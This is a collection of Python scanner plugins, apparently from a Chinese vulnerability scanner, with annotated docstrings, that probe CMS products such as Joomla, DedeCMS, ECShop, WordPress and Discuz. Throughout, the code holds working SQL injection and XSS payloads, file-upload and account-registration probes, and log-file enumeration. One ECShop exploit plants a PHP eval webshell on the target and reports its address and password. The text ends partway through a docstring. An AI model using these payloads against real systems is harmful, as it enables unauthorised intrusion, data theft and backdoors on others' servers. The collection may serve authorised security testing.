def verify(self):
        """Probe ``index.php?basePath=`` with an external URL and look for a marker.

        ``self.target`` is rewritten in place to append the ``base_path``
        option, so a second call on the same instance would append it again.
        A single GET is sent with a spoofed ``Host`` header; the response body
        is searched for md5('3.1416') and a finding is reported through
        ``self.output.report`` when it is present.  Any exception (including
        timeouts and connection errors) is logged via ``self.output.info`` and
        swallowed, so an unreachable host looks the same as a clean result.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            # basePath is pointed at a third-party URL; the response is then
            # checked for the marker below.
            vul_url = arg + '/index.php?basePath=http://baidu.com/robots.txt'
            # Spoofed HTTP headers
            httphead = {
                'Host': 'www.google.com',
                'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'keep-alive'
            }
            # Bounded by timeout=50 so a stalled host cannot hang the scan.
            resp = requests.get(vul_url, headers=httphead, timeout=50)
            # md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
            match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.text)
            # A match on md5('3.1416') is taken as confirmation of the issue
            if match:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            # Broad catch: every failure mode is reported as "execution
            # exception" and not re-raised.
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Enumerate daily log files under ``/Data/Log/`` for the year 2018.

        Walks every date from 2018-01-02 to 2018-12-31 (the day is advanced
        before the first URL is built), requests ``/Data/Log/YY_MM_DD.log``
        and reports the first response that is HTTP 200 and contains
        ``INFO:``.  Up to ~365 requests are issued with no timeout, so a
        slow host can stall the scan.  Unlike the sibling ``verify`` methods
        this one does not rewrite ``self.target``.  Exceptions are logged and
        swallowed.
        """
        try:
            self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)

            # Date window is hard-coded; logs from other years are not probed.
            start = '2018-01-01'
            end = '2018-12-31'
            datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
            dateend = datetime.datetime.strptime(end, '%Y-%m-%d')

            while datestart < dateend:
                datestart += datetime.timedelta(days=1)
                # '%Y_%m_%d' gives 'YYYY_MM_DD'; [2:10] keeps 'YY_MM_DD'.
                payload = datestart.strftime('%Y_%m_%d')[2:10]

                vul_url = arg + '/Data/Log/' + payload + '.log'
                # No timeout: relies on the server answering promptly.
                response = requests.get(vul_url)
                if response.status_code == 200 and 'INFO:' in response.text:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format(
                            target=self.target,
                            name=self.vuln.name,
                            url=vul_url))
                    # Stop at the first readable log file.
                    break
        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check the ``com_kunena`` userlist search for a UNION-based SQL injection.

        ``self.target`` is rewritten in place to append ``base_path``.  One GET
        is sent whose ``search`` parameter makes the database compute
        md5(3.1415); the finding is reported when the digest appears in the
        response body.  The request is bounded by ``timeout=50``.  Exceptions
        are logged and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            # Request path
            exploit = '/index.php?option=com_kunena&func=userlist&search='
            # UNION-based probe (makes the server compute md5(3.1415))
            payload = "%' and 1=2) union select 1, 1,md5(3.1415),1,1,1,1,1,1,1,0,0,0,1,1-- ;"
            # Build the probe URL (the payload is not URL-encoded here;
            # requests encodes what it must)
            vulurl = arg+exploit+payload
            # Custom HTTP headers
            httphead = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'keep-alive'
            }
            # Send the request
            resp = requests.get(url=vulurl, headers=httphead, timeout=50)
            # Check for the marker string (md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
            if '63e1f04640e83605c1d177544a5a0488' in resp.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Run two error-based SQL injection probes and report each that echoes.

        ``self.target`` is rewritten in place to append ``base_path``.  The
        first probe is a GET on ``?m=info.detail``, the second a POST on
        ``?m=city.getSearch``; both ask the database to wrap CURRENT_USER()
        between ``~~~`` markers, and ``re.findall`` looks for that framing in
        the response.  The extracted value itself is not reported, only the
        URL.  Neither request sets a timeout.  Exceptions are logged and
        swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
            resp = requests.get(self.target + payload)
            # Anything framed by '~~~' counts as an echo of the injected value.
            re_result = re.findall(r'~~~(.*?)~~~', resp.text, re.S | re.I)
            vulurl1 = "%s/?m=city.getSearch&index=xx" % self.target
            payload1 = {
                "key":
                "xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"
            }
            resp1 = requests.post(vulurl1, data=payload1)
            re_result1 = re.findall(r'~~~(.*?)~~~', resp1.text, re.S | re.I)
            # Both probes are reported independently (two findings are possible).
            if re_result:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                        target=self.target,
                        name=self.vuln.name,
                        url=self.target + payload))
            if re_result1:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=vulurl1))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Try several error-based SQL injection endpoints and report each hit.

        ``self.target`` is rewritten in place to append ``base_path``.  Each
        payload is appended to the target URL and fetched without a timeout;
        a finding is reported when the response is HTTP 200 and contains
        md5(123) (202cb962ac59075b964b07152d234b70).

        NOTE: ``payloads`` is a set, so the probe order is not deterministic.
        NOTE: ``target_url = arg = arg + payload`` rebinds ``arg`` on every
        iteration, so from the second iteration on each URL still carries all
        previous payloads appended before the current one; only the first URL
        is the intended one.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            arg = '{target}'.format(target=self.target)
            payloads = {
                '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#',
                '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23',
                '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa',
                "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#",
                "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            }
            for payload in payloads:
                # See the docstring: this accumulates payloads into ``arg``.
                target_url = arg = arg + payload
                req = requests.get(target_url)
                if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text:
                    self.output.report(
                        self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                            target=self.target,
                            name=self.vuln.name,
                            url=target_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
 def verify(self):
     """Look for PHP path disclosure in a fixed list of plugin/addon scripts.

     ``self.target`` is rewritten in place to append ``base_path``.  Each
     path is fetched without a timeout and the body is matched against the
     PHP warning pattern ``in <b>...</b> on line``; every matching path
     produces a separate report (there is no ``break``), so one host may be
     reported several times.  Exceptions are logged and swallowed.
     """
     self.target = self.target.rstrip(
         '/') + '/' + (self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
             target=self.target, vuln=self.vuln))
         payloads = [
             '/api/addons/zendcheck.php',
             '/api/addons/zendcheck52.php',
             '/api/addons/zendcheck53.php',
             '/source/plugin/mobile/api/1/index.php',
             '/source/plugin/mobile/extends/module/dz_digest.php',
             '/source/plugin/mobile/extends/module/dz_newpic.php',
             '/source/plugin/mobile/extends/module/dz_newreply.php',
             '/source/plugin/mobile/extends/module/dz_newthread.php',
         ]
         # Compiled once outside the loop; captures the file-system path PHP
         # prints in its HTML-formatted warnings.
         pathinfo = re.compile(r' in <b>(.*)</b> on line')
         for payload in payloads:
             verify_url = self.target + payload
             req = requests.get(verify_url)
             match = pathinfo.findall(req.text)
             if match:
                 self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                     target=self.target, name=self.vuln.name))
     except Exception as e:
         self.output.info('执行异常:{}'.format(e))
    def verify(self):
        """Check ``member/resetpassword.php`` for a password-reset bypass marker.

        ``self.target`` is rewritten in place to append ``base_path``.  One
        GET is sent with an empty cookie jar (the cookie-parsing snippet below
        is a dead string literal, not executed code) and no timeout; a finding
        is reported when ``key=`` appears anywhere in the body.  That marker
        is short and generic, so false positives are plausible.  Exceptions
        are logged and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_V5.7_
            # Register an account and log in first, then request the URL below.
            # Cookies (currently always empty; see docstring)
            cookies = {}
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            payload = "/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1"
            url = self.target + payload
            r = requests.get(url, cookies=cookies)

            if 'key=' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check ``flashmediaelement.swf`` for the M3U8-driven XSS marker.

        ``self.target`` is rewritten in place to append ``base_path``.  One
        GET (no timeout) points the SWF at a third-party ``exp.m3u8``; a
        finding is reported only when the response is HTTP 200, contains
        ``alert(2)`` and also contains ``>17<`` or ``>32<``.  The triple-quoted
        block below is a dead string literal kept as a sample of that M3U8.
        Exceptions are logged and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # The M3U8 format lets the file contents name the fragment URL to load.

            # exp.m3u8
            '''
            #EXTM3U
            #EXT-X-TARGETDURATION:10
            #EXTINF:10,
            http://www.baidu.com/a.ts\")+alert(2))}catch(e){}//
            '''
            # Relies on an externally hosted file; the check silently fails
            # if that host is down.
            payload = "/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8"
            url = self.target + payload
            r = requests.get(url)

            if r.status_code == 200 and 'alert(2)' in r.text:
                if ('>17<' in r.text) or ('>32<' in r.text):
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                        target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check the manager ``thirdpart_config`` form for stored XSS.

        ``self.target`` is rewritten in place to append ``base_path``.  This
        check is state-changing: it POSTs a new entry to
        ``/manager/admin_ajax.php`` (authenticated via the ``cookie`` option),
        then fetches ``/manager/api_manager.php`` and reports when the
        injected ``<script>`` is echoed verbatim inside a ``<td>``.  The
        entry is not removed afterwards.  Neither request sets a timeout.
        Exceptions are logged and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config"

            # This endpoint requires a logged-in session; the cookie comes
            # from the ``cookie`` option.
            headers = {
                'Content-Type': 'application/x-www-form-urlencoded',
                'Cookie': self.get_option('cookie')
            }
            # Pre-encoded form body; sent as a raw string, not a dict.
            data = '''id=&flag=add&device_name=%3Cscript%3Ealert%28%27cscan%27%29%3C%2Fscript%3E&api_url=&logo_url=&app_key='''
            vul_url = arg + payload

            # Submit the stored-XSS probe (persists on the target)
            response = requests.post(vul_url, headers=headers, data=data)

            payload2 = "/manager/api_manager.php"
            vul_url2 = arg + payload2

            # Check whether the probe is rendered unescaped
            response2 = requests.get(vul_url2, headers=headers)
            if response2.status_code == 200 and "<td><script>alert('cscan')</script></td>" in response2.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))
        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check ``member/special.php`` for an error-based SQL injection.

        ``self.target`` is rewritten in place to append ``base_path``.  One
        GET is sent with an empty cookie jar (the cookie-parsing snippet is
        a dead string literal) and no timeout; the injected query computes
        md5('c') and a finding is reported when that digest
        (4a8a08f09d37b73795649038408b5f33) appears in the body.  Because no
        session cookie is sent, the check may never reach the vulnerable
        code path on installs that require login.  Exceptions are logged and
        swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # First register a user, create a topic and note its ID.
            # Cookies (currently always empty; see docstring)
            cookies = {}
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            payload = "/member/special.php?job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,((select concat(username,0x5c,md5(c)) from qb_members limit 0,1))),0) %23"
            url = self.target + payload
            r = requests.get(url, cookies=cookies)

            # md5('c') = 4a8a08f09d37b73795649038408b5f33
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
 def verify(self):
     """Check the editor's ``img_save.asp`` for unrestricted file upload.

     ``self.target`` is rewritten in place to append ``base_path``.  This
     check is state-changing: it POSTs a hand-built multipart body carrying
     a ``.cer`` file whose content is ``testvul``, parses the returned
     ``getimg('<id>.cer')`` call, then fetches the stored file from
     ``NewImage/`` and reports when it is served back with that content.
     The report message asks the operator to delete the uploaded file.
     Neither request sets a timeout.  Exceptions are logged and swallowed.

     NOTE(review): the body is sent as a plain string with no multipart
     ``Content-Type``/boundary header, so whether the server parses it as
     multipart depends on the target — confirm before relying on this.
     """
     self.target = self.target.rstrip('/') + '/' + (
         self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
             target=self.target, vuln=self.vuln))
         arg = '{target}'.format(target=self.target)
         vun_url = arg + "/library/editornew/Editor/img_save.asp"
         # Raw multipart body; the leading indentation of each line is part
         # of what gets sent.
         data = '''
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="img_src"; filename="123.cer"
             Content-Type: application/x-x509-ca-cert
 
             testvul
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="Submit"
 
             提交
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="img_alt"
 
 
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="img_align"
 
             baseline
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="img_border"
 
 
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="newid"
 
             45
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="img_hspace"
 
 
             ------WebKitFormBoundaryNjZKAB66SVyL1INA
             Content-Disposition: form-data; name="img_vspace"
 
 
             ------WebKitFormBoundaryNjZKAB66SVyL1INA--
             '''
         r = requests.post(vun_url, data=data)
         res = r.text
         # Captures the server-assigned file name; the '.' before 'cer' is
         # unescaped and matches any character.
         match = re.search(r'getimg\(\'([\d]+.cer)\'\)', res)
         if match:
             verify_url = arg + \
                 "/library/editornew/Editor/NewImage/"+match.group(1)
             rg = requests.get(verify_url)
             if rg.status_code == 200 and "testvul" in rg.text:
                 self.output.report(
                     self.vuln,
                     '发现{target}存在{name}漏洞;\n在该验证过程中上传了文件地址为:{url},请及时删除。'.
                     format(target=self.target,
                            name=self.vuln.name,
                            url=verify_url))
     except Exception as e:
         self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Exploit routine that writes a PHP file on the target and then calls it.

        ``self.target`` is rewritten in place to append ``base_path``.  This
        is destructive: it sends a crafted ``Referer`` to ``user.php?act=login``
        intended to create a PHP file on the target, then POSTs to that file
        and reports when md5('c') (4a8a08f09d37b73795649038408b5f33) comes
        back.  The created file is not removed and its location is printed in
        the report.  No request sets a timeout.  Exceptions are logged and
        swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的漏洞利用'.format(
                target=self.target, vuln=self.vuln))

        # Pick a one-letter file name
            randstr = chr(random.randint(96, 122))

            filename_poc = randstr + '.php'
            payload = "file_put_contents('(unknown)','<?php eval($_POST[111]); ?>')".format(filename=filename_poc)
            self.output.info("随机payload生成成功")
            # Base64-wrap, then hex-encode, so the payload survives the
            # serialized Referer below.
            payload_base64 = '''{$asd'];assert(base64_decode('%s'));//}xxx''' %base64.b64encode(payload.encode('utf-8')).decode('ascii')
            self.output.info("使用Base64加密payload")
            payload_hex = binascii.b2a_hex(payload_base64.encode('utf-8')).decode('ascii')
            self.output.info("使用十六进制加密payload")
            refer = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x%s,10-- -";s:2:"id";s:3:"'/*";}''' % payload_hex
            headers = {
                'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
                'Referer': refer
            }

            url_paylpad = self.target + "/user.php?act=login"
            # Response of this request is not inspected.
            r = requests.get(url_paylpad,headers=headers)
            self.output.info("正在进行漏洞利用...")
            poc_url = self.target + filename_poc
            post_data = {"111": "echo md5(c);"}
            r2 = requests.post(poc_url, data=post_data)
            if '4a8a08f09d37b73795649038408b5f33' in r2.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞,webshell地址:{webshell},密码:111'.format(
                        target=self.target, name=self.vuln.name, webshell=self.target + filename_poc))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Try three ``updatexml``-based SQL injection probes on the front end.

        ``self.target`` is rewritten in place to append ``base_path``.  Each
        probe is appended as a query string directly to the target (so the
        target must already end in a path the parameters apply to) and fetched
        without a timeout; a finding is reported for every response that is
        HTTP 200 and contains the marker.  The marker is 31 hex characters,
        which looks like a truncated md5 digest — substring matching still
        works but is slightly less specific.  Exceptions are logged and
        swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Reference : http://www.wooyun.org/bugs/wooyun-2014-080751
            payloads = [
                '?m=product&s=list&key=%27%20and%201=updateXml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
                '?m=shop&id=&province=%27%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
                '?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23'
            ]
            for payload in payloads:
                verify_url = self.target + payload
                req = requests.get(verify_url)

                # 31-character marker (see docstring)
                if req.status_code == 200 and "4beed3b9c4a886067de0e3a094246f7" in req.text:
                    self.output.report(
                        self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                            target=self.target,
                            name=self.vuln.name,
                            url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
 def verify(self):
     """Check ``extpmsPdtInfo.do`` for reflected XSS in the search keyword.

     ``self.target`` is rewritten in place to append ``base_path``.  One
     GET with a form body (``data=`` on a GET) is sent without a timeout and
     a finding is reported when the literal ``/Cscan-hyhmnn/`` is reflected.

     NOTE(review): ``Content-Length`` is hard-coded to ``'234'`` while the
     body is built separately, and ``Host`` is set to ``self.target`` (which
     includes the scheme/path); both look like artefacts of a captured
     request and may make the server reject or stall the request — confirm
     against a known-vulnerable instance.  Exceptions are logged and
     swallowed.
     """
     self.target = self.target.rstrip('/') + '/' + (
         self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
             target=self.target, vuln=self.vuln))
         payload = "/extpmsPdtInfo.do?action=list"
         # Headers replayed from a captured request (see docstring)
         headers = {
             'Content-Length': '234',
             'Content-Type': 'application/x-www-form-urlencoded',
             'Referer': 'http://**.**.**.**:80/zgLoginAction.do',
             'Cookie':
             'JSESSIONID=A5C98CCF4A7C81CC4A3438C86412A367; rayvwulm=1',
             'Host': self.target,
             'Connection': 'Keep-alive',
             'Accept-Encoding': 'gzip,deflate',
             'User-Agent':
             'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
             'Accept': '*/*'
         }
         # The whole form is packed into the value of the single 'BRAND' key.
         data = {
             'BRAND':
             "&CHIP=&CONSUME_GROUP=&input=1&OS=&PDT_TYPE=&searchType=&SKSD=&value(keyword)=1'%22()%26%25<acx><ScRiPt%20>alert(“/Cscan-hyhmnn/”)</ScRiPt>&value(orderByStr)=&value(SALE_PRICE)=&value(SCREEN_SIZE)=&value(select_value)=&value(withPeomote)="
         }
         url = self.target + payload
         response = requests.get(url, headers=headers, data=data)
         if "/Cscan-hyhmnn/" in response.text:
             self.output.report(
                 self.vuln,
                 '发现{target}存在{name}漏洞'.format(target=self.target,
                                               name=self.vuln.name))
     except Exception as e:
         self.output.info('执行异常:{}'.format(e))
    def exploit(self):
        """Exploit routine that registers a member account via ``reg_new.php``.

        ``self.target`` is rewritten in place to append ``base_path``.  This
        is state-changing on the target (creates an account named
        ``admin_<n>``).  A finding is reported when the response is HTTP 200
        and contains both the random name and ``注册成功``.

        NOTE: ``data`` is built but never sent — the GET below uses only
        ``url``, so the request carries none of the form fields.
        NOTE: the report call passes ``passwoed=`` while the template expects
        ``{password}``; ``str.format`` raises ``KeyError``, which the broad
        ``except`` turns into an "execution exception" log line, so the
        success report can never be emitted as written.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Set verification_code to the CAPTCHA value for the target
            verification_code = 'aaaa'
            # Generate random registration data
            randstr = 'admin_' + str(random.randint(1, 10000))
            payload = '/dede/member/reg_new.php'
            data = "?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwdok}&email={email}%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','*****@*****.**','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode={verification_code}&agree=".format(
                userid=randstr,
                uname=randstr,
                userpwd=randstr,
                userpwdok=randstr,
                email=randstr,
                verification_code=verification_code)
            url = self.target + payload
            # ``data`` is not passed here (see docstring)
            r = requests.get(url)

            if r.status_code == 200 and randstr in r.text and '注册成功' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,已注册会员用户名为:{uname},密码为:{password},请及时删除!'
                    .format(target=self.target,
                            name=self.vuln.name,
                            uname=randstr,
                            passwoed=randstr))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check ``com_timereturns`` for an error-based SQL injection.

        ``self.target`` is rewritten in place to append ``base_path``.  One
        GET (bounded by ``timeout=50``) asks the database to compute md5(1)
        inside a duplicate-key error; a finding is reported when the digest
        (c4ca4238a0b923820dcc509a6f75849b) appears in the body.  Exceptions
        are logged and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            # Probe payload (uses the floor()/rand() duplicate-key error to echo)
            payload = "1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
                "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
            # Vulnerable page
            exploit = '/index.php?option=com_timereturns&view=timereturns&id='
            # Build the request URL
            vulurl = arg + exploit + payload
            # Custom HTTP headers
            httphead = {
                'User-Agent':
                'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'keep-alive'
            }
            # Send the request
            resp = requests.get(url=vulurl, headers=httphead, timeout=50)
            # Check for the marker string (md5(1)=c4ca4238a0b923820dcc509a6f75849b)
            if 'c4ca4238a0b923820dcc509a6f75849b' in resp.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check the admin ``groups_manage`` search for an error-based SQL injection.

        ``self.target`` is rewritten in place to append ``base_path``.  The
        endpoint is behind the admin login, so a valid session cookie is
        required for the probe to reach the vulnerable query.  One GET is
        sent without a timeout and a finding is reported when md5(233)
        (e165421110ba03099a1c0393373c5b43, per the original comment) appears
        in the body.

        NOTE: ``cookie`` is assigned but never used; the header actually sent
        is the literal string ``cookie``, so as written this check is not
        authenticated.  Exceptions are logged and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            # Back-end (admin) check: a login cookie is needed; see the
            # corresponding PDF for details.
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # this poc need to login, so special cookie for target must be included in http headers.
            cookie = ''
            # Sends the literal value 'cookie', not the variable above.
            header = {'cookie': 'cookie'}
            payload = (
                "/admin.php?adminjob=apps&admintype=groups_manage&action=argument&keyword=1"
                +
                "&ttable=/**/tm ON t.tid=tm.tid LEFT JOIN pw_argument a ON t.tid="
                +
                "a.tid LEFT JOIN pw_colonys c ON a.cyid=c.id WHERE (SELECT 1 FROM (select count(*),concat"
                +
                "(floor(rand(0)*2),CONCAT(0x3a,(SELECT md5(233))))a from information_schema.tables group by a)b)%23"
            )
            verify_url = self.target + payload
            req = requests.get(verify_url, headers=header)

            if 'e165421110ba03099a1c0393373c5b43' in req.text:
                #args['success'] = True
                #args['poc_ret']['vul_url'] = verify_url
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check ``order.php?id=`` for SQL injection using two encodings of the probe.

        ``self.target`` is rewritten in place to append ``base_path``.  Each
        payload is fetched without a timeout with a fixed ``Cookie`` header;
        a finding is reported for every response that is HTTP 200 and
        contains md5(123) (202cb962ac59075b964b07152d234b70).  Exceptions are
        logged and swallowed.

        NOTE: the nested ``getString`` helper is defined but never called.
        """
